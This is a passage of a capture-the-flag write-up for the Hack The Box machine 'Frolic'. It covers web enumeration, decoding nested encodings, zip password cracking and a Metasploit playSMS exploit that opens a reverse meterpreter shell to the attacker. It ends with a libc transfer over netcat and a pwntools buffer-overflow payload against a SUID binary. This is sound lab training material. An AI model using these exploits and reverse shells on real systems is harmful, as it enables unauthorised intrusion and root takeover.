+ 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
+ 9999/tcp open http nginx 1.10.3 (Ubuntu)
+ |_http-server-header: nginx/1.10.3 (Ubuntu)
+ |_http-title: Welcome to nginx!
+ Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Host script results:
+ |_clock-skew: mean: -1h49m30s, deviation: 3h10m30s, median: 28s
+ |_nbstat: NetBIOS name: FROLIC, NetBIOS user: <****unknown>, NetBIOS MAC: <****unknown> (unknown)
+ | smb-os-discovery:
+ | OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
+ | Computer name: frolic
+ | NetBIOS computer name: FROLIC\x00
+ | Domain name: \x00
+ | FQDN: frolic
+ |_ System time: 2019-12-04T15:00:07+05:30
+ | smb-security-mode:
+ | account_used: guest
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: disabled (dangerous, but default)
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2019-12-04T09:30:07
+ |_ start_date: N/A
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 15.21 seconds
+
+## **Part 2 : Getting User Access**
+
+Our nmap picked up a nginx service running on port 9999. Let's run the dirsearch command with the -r -e -t and -x flags.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → dirsearch -u http://10.10.10.111:9999/ -r -e php -t 50 -x 403
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php | HTTP method: get | Threads: 50 | Wordlist size: 6027 | Recursion level: 1
+
+ Error Log: /home/nihilist/.dirsearch/logs/errors-19-12-05_09-16-15.log
+
+ Target: http://10.10.10.111:9999/
+
+ [09:16:16] Starting:
+ [09:16:16] 400 - 182B - /%2e%2e/google.com
+ [09:16:19] 301 - 194B - /admin -> http://10.10.10.111:9999/admin/
+ [09:16:19] 200 - 634B - /admin/
+ [09:16:19] 200 - 634B - /admin/?/login
+ [09:16:19] 200 - 634B - /admin/index.md
+ [09:16:22] 301 - 194B - /backup -> http://10.10.10.111:9999/backup/
+ [09:16:22] 200 - 28B - /backup/
+ [09:16:24] 301 - 194B - /dev -> http://10.10.10.111:9999/dev/
+ [09:16:32] 301 - 194B - /test -> http://10.10.10.111:9999/test/
+ [09:16:32] 200 - 83KB - /test/
+ [09:16:33] Starting: admin/
+ [09:16:41] 301 - 194B - /admin/css -> http://10.10.10.111:9999/admin/css/
+ [09:16:44] 200 - 634B - /admin/index.md
+ [09:16:44] 301 - 194B - /admin/js -> http://10.10.10.111:9999/admin/js/
+ [09:16:51] Starting: backup/
+ [09:17:02] 200 - 28B - /backup/index.php
+ [09:17:04] 200 - 22B - /backup/password.txt
+ [09:17:08] 200 - 13B - /backup/user.txt
+ [09:17:09] Starting: dev/
+ [09:17:15] 301 - 194B - /dev/backup -> http://10.10.10.111:9999/dev/backup/
+ [09:17:15] 200 - 11B - /dev/backup/
+ [09:17:26] 200 - 5B - /dev/test
+ [09:17:27] Starting: test/
+ [09:17:38] 200 - 83KB - /test/index.php
+ [09:17:46] Starting: css/
+ [09:18:04] Starting: js/
+
+ Task Completed
+
+
+
+Dirsearch seems to have found the /admin/ folder.
+
+ 
+
+Looking at the sourcecode of that page, it seems to be calling the js/login.js script. So let's browse to it to see what we get. We will be using the curl command along with the -s and -k flags.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → curl -sk http://10.10.10.111:9999/admin/js/login.js
+ var attempt = 3; // Variable to count number of attempts.
+ // Below function Executes on click of login button.
+ function validate(){
+ var username = document.getElementById("username").value;
+ var password = document.getElementById("password").value;
+ if ( username == "admin" && password == "superduperlooperpassword_lol"){
+ alert ("Login successfully");
+ window.location = "success.html"; // Redirecting to other page.
+ return false;
+ }
+ else{
+ attempt --;// Decrementing by one.
+ alert("You have left "+attempt+" attempt;");
+ // Disabling fields after 3 attempts.
+ if( attempt == 0){
+ document.getElementById("username").disabled = true;
+ document.getElementById("password").disabled = true;
+ document.getElementById("submit").disabled = true;
+ return false;
+ }
+ }
+ }
+
+
+It seems that the javascript would redirect the user to yet another page which is success.html
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → curl -sk http://10.10.10.111:9999/admin/success.html
+ ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... .....
+ ..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... .....
+ ....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! .....
+ ..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!!
+ !!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... .....
+ ..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?.
+ ?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... .....
+ ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... .....
+ ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!!
+ !.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!!
+ !!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?!
+ .?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?..
+ !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?.
+ ?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.?
+ !!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!!
+ !.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!!
+ !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. .....
+ ..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!!
+ !!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!!
+ !!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .....
+ ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! .....
+ ..!.! !!!!! !.?.
+
+
+
+browsing to it we seem to get an [Ook!](https://www.dcode.fr/ook-language) encoded string. Decoding the string seems to show up the message **"Nothing here check /asdiSIAJJ0QWE9JAS"** So we will browse to it to see what we can work with.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → curl -sk http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/
+ UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB
+ BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs
+ K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve
+ EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj
+ lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC
+ AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG
+ AAAAAAEAAQBPAAAAAwEAAAAA
+
+
+Seems like we have a base64 string here, so we will pipe it into the base64 decoding command.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → curl -sk http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ | base64 -d
+ PK É7M#�[�i index.phpUT �|�[�|�[ux
+ ^D�J�s�h�)�P�n
+ ��Ss�Jw��4��ُk�z��UȖ�+X��P��ᶇ��л�x_�N�[���S��8����J2S�*�DЍ}�8dTQk������j_�����'xc��ݏt��75Q�
+ ���k,4��b)�4F�� ��������&q2o;�WԜ�9P#�[�iPK É7M#�[�i ��index.phpUT�|�[ux
+ PKO%
+
+
+
+Even weirder ! It seems to have taken a binary form. so we will save it locally and check what filetype it is.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → curl -sk http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ | base64 -d > unknown_file
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → file unknown_file
+ unknown_file: Zip archive data, at least v2.0 to extract
+
+
+
+So we have a zipfile to work with ! Let's give it it's appropriate extension and try to extract it once we find it's password using fcrackzip. We will be using the rockyou.txt wordlist to see if the password of that zip file is publicly known.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → curl -sk https://www.scrapmaker.com/data/wordlists/dictionaries/rockyou.txt > rockyou.txt
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → ls -l
+ total 136648
+ -rw-r--r-- 1 nihilist users 139921497 Dec 5 09:53 rockyou.txt
+ -rw-r--r-- 1 nihilist users 360 Dec 5 09:45 zipfile.zip
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → fcrackzip --help
+
+ fcrackzip version 1.0, a fast/free zip password cracker
+ written by Marc Lehmann <****pcg@goof.com> You can find more info on
+ http://www.goof.com/pcg/marc/
+
+ USAGE: fcrackzip
+ [-b|--brute-force] use brute force algorithm
+ [-D|--dictionary] use a dictionary
+ [-B|--benchmark] execute a small benchmark
+ [-c|--charset characterset] use characters from charset
+ [-h|--help] show this message
+ [--version] show the version of this program
+ [-V|--validate] sanity-check the algortihm
+ [-v|--verbose] be more verbose
+ [-p|--init-password string] use string as initial password/file
+ [-l|--length min-max] check password with length min to max
+ [-u|--use-unzip] use unzip to weed out wrong passwords
+ [-m|--method num] use method number "num" (see below)
+ [-2|--modulo r/m] only calculcate 1/m of the password
+ file... the zipfiles to crack
+
+ methods compiled in (* = default):
+
+ 0: cpmask
+ 1: zip1
+ *2: zip2, USE_MULT_TAB
+
+we will be using the zip password cracking tool with the -u , -D and -p flags.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → fcrackzip -u -D -p rockyou.txt zipfile.zip
+
+
+ PASSWORD FOUND!!!!: pw == password
+
+
+It was short ! now we can extract the zip file contents with the 7z command.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → 7z x zipfile.zip -ppassword
+
+ 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
+ p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Pentium(R) Silver N5000 CPU @ 1.10GHz (706A1),ASM,AES-NI)
+
+ Scanning the drive for archives:
+ 1 file, 360 bytes (1 KiB)
+
+ Extracting archive: zipfile.zip
+ --
+ Path = zipfile.zip
+ Type = zip
+ Physical Size = 360
+
+
+ Would you like to replace the existing file:
+ Path: ./index.php
+ Size: 0 bytes
+ Modified: 2018-09-23 12:44:05
+ with the file from archive:
+ Path: index.php
+ Size: 617 bytes (1 KiB)
+ Modified: 2018-09-23 12:44:05
+ ? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? y
+
+ Everything is Ok
+
+ Size: 617
+ Compressed: 360
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → ls
+ index.php rockyou.txt zipfile.zip
+
+
+
+It contained a php file named "index" , let's see what we can do with it.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → cat index.php
+ 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
+
+
+The contents of index.php seems to contain a hexadecimal encoded string. we will pipe the output of the cat command into the xxd command with the -r and -p flags.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → cat index.php | xxd -r -p
+ KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
+ KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
+ K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
+ LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==
+
+
+Looking at the results, we seem to have a base64 encoded string. we will pipe the output of the 2 previous commands into the base64 command with the -d flag.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → cat index.php | xxd -r -p | base64 -d
+ +++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+base64: invalid input
+
+
+Seems to be a brainfuck string ! however base64 doesn't like getting piped non-alphabet charcaters such as the endline special charcater, so we add the -i flag to bypass them.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → cat index.php |xxd -r -p | base64 -d -i
+ +++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+
+ ++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->---
+ <]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]>
+ ++..<
+
+
+Now that we have our full brainfuck encoded message , we will decode it using a brainfuck [interpreter](https://sange.fi/esoteric/brainfuck/impl/interp/i.html).
+
+
+
+Now we have a password we could work with ! Although we do not know where yet. Looking back at our dirsearch results we see that there the /dev/backup folder.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → curl -sk http://10.10.10.111:9999/dev/backup/
+ /playsms
+
+
+Yet another page ! let's browse to /playsms to see what we can work with.
+
+
+
+Seems like we have a login page ! let's test our "idkwhatispass" password with something trivial like root or admin
+
+ 
+
+Using the admin:idkwhatispass credentials, we have been able to log in ! We run a quick searchsploit command to see what exploits may be available for the playsms webservice
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → searchsploit playsms
+ ---------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ---------------------------------------------------- ----------------------------------------
+ PlaySMS - 'import.php' (Authenticated) CSV File Upl | exploits/php/remote/44598.rb
+ PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execu | exploits/php/webapps/42003.txt
+ PlaySMS 1.4 - 'import.php' Remote Code Execution | exploits/php/webapps/42044.txt
+ PlaySMS 1.4 - 'sendfromfile.php?Filename' (Authenti | exploits/php/remote/44599.rb
+ PlaySMS 1.4 - Remote Code Execution | exploits/php/webapps/42038.txt
+ PlaySms 0.7 - SQL Injection | exploits/linux/remote/404.pl
+ PlaySms 0.8 - 'index.php' Cross-Site Scripting | exploits/php/webapps/26871.txt
+ PlaySms 0.9.3 - Multiple Local/Remote File Inclusio | exploits/php/webapps/7687.txt
+ PlaySms 0.9.5.2 - Remote File Inclusion | exploits/php/webapps/17792.txt
+ PlaySms 0.9.9.2 - Cross-Site Request Forgery | exploits/php/webapps/30177.txt
+ ---------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+It seems like we may be able to use a metasploit module to get onto the machine, let's fire up msfconsole and see what we could potentially work with.
+
+
+ msf5 > search playsms
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/multi/http/playsms_filename_exec 2017-05-21 excellent Yes PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution
+ 1 exploit/multi/http/playsms_uploadcsv_exec 2017-05-21 excellent Yes PlaySMS import.php Authenticated CSV File Upload Code Execution
+
+
+ msf5 >
+
+
+
+ msf5 > use multi/http/playsms_uploadcsv_exec
+ msf5 exploit(multi/http/playsms_uploadcsv_exec) > show options
+
+ Module options (exploit/multi/http/playsms_uploadcsv_exec):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ PASSWORD admin yes Password to authenticate with
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 80 yes The target port (TCP)
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ TARGETURI / yes Base playsms directory path
+ USERNAME admin yes Username to authenticate with
+ VHOST no HTTP server virtual host
+
+
+ Payload options (php/meterpreter/reverse_tcp):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ LHOST yes The listen address (an interface may be specified)
+ LPORT 4444 yes The listen port
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 PlaySMS 1.4
+
+
+
+Seems like we have to set the rhost, lhost, rport, targeturi and password options.
+
+
+ msf5 exploit(multi/http/playsms_uploadcsv_exec) > set rhosts 10.10.10.111
+ rhosts => 10.10.10.111
+
+ msf5 exploit(multi/http/playsms_uploadcsv_exec) > set lhost 10.10.14.48
+ lhost => 10.10.14.48
+
+ msf5 exploit(multi/http/playsms_uploadcsv_exec) > set rport 9999
+ rport => 9999
+
+ msf5 exploit(multi/http/playsms_uploadcsv_exec) > set targeturi /playsms/
+ targeturi => /playsms/
+
+ msf5 exploit(multi/http/playsms_uploadcsv_exec) > set password idkwhatispass
+ password => idkwhatispass
+
+ msf5 exploit(multi/http/playsms_uploadcsv_exec) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.48:4444
+ [+] Authentication successful: admin:idkwhatispass
+ [*] Sending stage (38288 bytes) to 10.10.10.111
+ [*] Meterpreter session 1 opened (10.10.14.48:4444 -> 10.10.10.111:41616) at 2019-12-05 11:04:30 +0100
+
+ meterpreter > sysinfo
+ Computer : frolic
+ OS : Linux frolic 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:22:43 UTC 2018 i686
+ Meterpreter : php/linux
+
+
+it worked ! we have a meterpreter session onto the linux box. Let's create a shell and see if we can print out the user flag.
+
+
+
+ meterpreter > shell
+ Process 24934 created.
+ Channel 0 created.
+ whoami
+ www-data
+
+ cd ../../../../home
+
+ ls
+ ayush
+ sahay
+
+ cd ayush
+
+ ls
+ user.txt
+
+ cat user.txt
+ 2aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And we have the user flag !
+
+## **Part 3 : Getting Root Access**
+
+Now in order to elevate our shell to administrating privileges, we first have to find binary files with the SUID bit active.$
+
+
+ find / -perm -4000 2>/dev/null
+ /sbin/mount.cifs
+ /bin/mount
+ /bin/ping6
+ /bin/fusermount
+ /bin/ping
+ /bin/umount
+ /bin/su
+ /bin/ntfs-3g
+
+ **/home/ayush/.binary/rop**
+
+ /usr/bin/passwd
+ /usr/bin/gpasswd
+ /usr/bin/newgrp
+ /usr/bin/newuidmap
+ /usr/bin/pkexec
+ /usr/bin/at
+ /usr/bin/sudo
+ /usr/bin/newgidmap
+ /usr/bin/chsh
+
+
+
+There seems to be something interesting in /home/ayush/.binary/rop ! Let's first spawn a TTY Shell , then see what we can work with in the .binary directory
+
+
+ python -c 'import pty; pty.spawn("/bin/sh")'
+ $ cd /home/ayush
+ cd ayush
+
+ $ ls -la
+ ls -la
+ total 36
+ drwxr-xr-x 3 ayush ayush 4096 Sep 25 2018 .
+ drwxr-xr-x 4 root root 4096 Sep 23 2018 ..
+ -rw------- 1 ayush ayush 2781 Sep 25 2018 .bash_history
+ -rw-r--r-- 1 ayush ayush 220 Sep 23 2018 .bash_logout
+ -rw-r--r-- 1 ayush ayush 3771 Sep 23 2018 .bashrc
+ drwxrwxr-x 2 ayush ayush 4096 Sep 25 2018 .binary
+ -rw-r--r-- 1 ayush ayush 655 Sep 23 2018 .profile
+ -rw------- 1 ayush ayush 965 Sep 25 2018 .viminfo
+ -rwxr-xr-x 1 ayush ayush 33 Sep 25 2018 user.txt
+
+ $ cd .binary
+ cd .binary
+
+ $ ls
+ ls
+ rop
+
+ $ ls -la
+ ls -la
+ total 16
+ drwxrwxr-x 2 ayush ayush 4096 Sep 25 2018 .
+ drwxr-xr-x 3 ayush ayush 4096 Sep 25 2018 ..
+ -rwsr-xr-x 1 root root 7480 Sep 25 2018 rop
+
+ $ ./rop
+ ./rop
+ [*] Usage: program <****message>
+
+ $ ./rop nihilist
+ ./rop nihilist
+ [+] Message sent: nihilist$
+
+ $ ./rop 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+ ./rop 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+ Segmentation fault (core dumped)
+
+ $ cat /proc/sys/kernel/randomize_va_space
+ cat /proc/sys/kernel/randomize_va_space
+ 0
+
+As you can see, the rop binary possess root privileges, and it seems that there may be a buffer overflow vulnerability that we can work with. Also note that ASLR is disabled (0) on the machine which means that the buffer overflow vuln could potentially give us a privilege escalation. let's download the rop binary locally first, we will simply use python's SimpleHTTPServer that is present on the machine in combination with wget on our local machine.
+
+_Terminal 1:_
+
+
+ $ ls
+ ls
+ rop
+
+ $ python -m SimpleHTTPServer
+ python -m SimpleHTTPServer
+ Serving HTTP on 0.0.0.0 port 8000 ...
+
+ 10.10.14.48 - - [05/Dec/2019 15:53:19] "GET /rop HTTP/1.1" 200
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → wget 10.10.10.111:8000/rop
+ --2019-12-05 11:22:47-- http://10.10.10.111:8000/rop
+ Connecting to 10.10.10.111:8000... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 7480 (7.3K) [application/octet-stream]
+ Saving to: ‘rop’
+
+ rop 100%[==============================================>] 7.30K --.-KB/s in 0s
+
+ 2019-12-05 11:22:47 (171 MB/s) - ‘rop’ saved [7480/7480]
+
+
+Now that we have the binary saved locally, let's see what we can do with it.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → locate pattern_create
+ /opt/metasploit/.tools/exploit/pattern_create.rb
+ /opt/metasploit/tools/exploit/pattern_create.rb
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → /opt/metasploit/tools/exploit/pattern_create.rb -l 128
+ WARNING: Nokogiri was built against LibXML version 2.9.9, but has dynamically loaded 2.9.10
+ Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae
+
+
+Now that we have
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → gdb -q rop
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 79 commands loaded for GDB 8.3.1 using Python engine 3.8
+ [*] 1 command could not be loaded, run `gef missing` to know why.
+ Reading symbols from rop...
+ (No debugging symbols found in rop)
+ gef➤ checksec
+ [+] checksec for '/home/nihilist/_HTB/Frolic/rop'
+ Canary : No
+ NX : Yes
+ PIE : No
+ Fortify : No
+ RelRO : Partial
+
+
+
+one thing to note is that when we run the checksec command onto the rop binary within GEF, we see that the NX bit is enabled, which means that we won't be able to execute shellcode on the stack.
+
+
+
+ gef➤ run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae
+ Starting program: /home/nihilist/_HTB/Frolic/rop Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae
+
+ Program received signal SIGSEGV, Segmentation fault.
+ 0x62413762 in ?? ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $eax : 0x80
+ $ebx : 0xffffd2c0 → "4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae"
+ $ecx : 0xffffd220 → 0xf7f8ece0 → 0xfbad2a84
+ $edx : 0xffffd2d8 → 0xf7f8de00 → 0x00000000
+ $esp : 0xffffd290 → "8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4A[...]"
+ $ebp : 0x41366241 ("Ab6A"?)
+ $esi : 0xf7f8de24 → 0x001e2d2c (",-"?)
+ $edi : 0xf7f8de24 → 0x001e2d2c (",-"?)
+ $eip : 0x62413762 ("b7Ab"?)
+ $eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
+ $cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0xffffd290│+0x0000: "8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4A[...]" ← $esp
+ 0xffffd294│+0x0004: "Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad[...]"
+ 0xffffd298│+0x0008: "c1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7[...]"
+ 0xffffd29c│+0x000c: "2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8A[...]"
+ 0xffffd2a0│+0x0010: "Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae[...]"
+ 0xffffd2a4│+0x0014: "c5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1[...]"
+ 0xffffd2a8│+0x0018: "6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae"
+ 0xffffd2ac│+0x001c: "Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae"
+ ─────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
+ [!] Cannot disassemble from $PC
+ [!] Cannot access memory at address 0x62413762
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "rop", stopped, reason: SIGSEGV
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+looking at the results, we see that the program crashes with EIP set to 0x62413762. let's run pattern_offset.rb to find the offset of 0x62413762.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → locate pattern_offset.rb
+ /opt/metasploit/.tools/exploit/pattern_offset.rb
+ /opt/metasploit/tools/exploit/pattern_offset.rb
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → /opt/metasploit/tools/exploit/pattern_offset.rb -q 0x62413762
+ WARNING: Nokogiri was built against LibXML version 2.9.9, but has dynamically loaded 2.9.10
+ [*] Exact match at offset 52
+
+
+We seem to have an exact match at offset 52! back to our meterpreter session, we use either curl or wget to download the libc library locally.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → nc -lvnp 4444 > libc
+
+ listening on [any] 4444 ...
+ connect to [10.10.14.23] from (UNKNOWN) [10.10.10.111] 59480
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → one_gadget -f libc rop
+
+ 0x3ac5c execve("/bin/sh", esp+0x28, environ)
+ constraints:
+ esi is the GOT address of libc
+ [esp+0x28] == NULL
+
+
+
+now that we have a gadget at 0x3ac5c, we should be able to get a shell. Although we need to find libc's base address, for that matter we will use the ldd command.
+
+
+ $ ldd rop
+ ldd rop
+ linux-gate.so.1 => (0xb7fda000)
+ libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
+ /lib/ld-linux.so.2 (0xb7fdb000)
+
+
+And that's all we need ! we have the base address 0xb7e19000, now we are ready to write our exploit.
+
+
+ from pwn import *
+
+ payload = "A" * 52 + p32(0xb7e19000+0x3ac5c)
+
+ print payload
+
+
+Running the exploit locally for it to generate the payload, we will then upload the payload onto the machine and it will give us a privilege escalation.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Frolic] → python exploit.py > payload
+
